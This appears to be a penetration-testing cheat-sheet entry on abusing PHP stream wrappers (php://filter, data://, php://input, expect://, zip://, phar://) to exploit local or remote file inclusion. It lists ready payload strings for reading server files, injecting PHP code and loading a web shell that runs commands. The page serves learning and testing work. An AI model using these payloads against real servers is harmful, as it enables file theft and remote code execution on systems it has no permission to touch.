PHP Wrappers File Inclusion

fileinclusion php_filters remote_file_inclusion xslt_code_execution local_file_inclusion_wrappers pyrat_auction

PHP Wrappers can be used to exploit a LFI/RFI on a server as an alternative to path traversal or similar techniques.

To read a file (encoded as base64): php://filter/read=convert.base64-encode/resource=/path/to/file

To inject some code (encoded as base64):

  • data://text/plain;base64,<base64 php code here>
  • allow_url_include must be enabled πŸ›‘

To inject some code (as POST data), inject php://input and use:

$ curl -s -X POST --data '<?php /* code */ ?>' [...]

We can also use some special wrappers:

  • expect://id: run the id command, not often installed
  • zip://./path/to/shell.zip%23shell.php&cmd=id: if enabled, we can load a shell inside a zip (.zip extension not mandatory).
  • phar://./path/to/shell.phar%2Fshell.php&cmd=id: if enabled, we can load a shell inside a zip (.phar extension not mandatory).

Refer to payloads to generate phar archives or to write PHP code.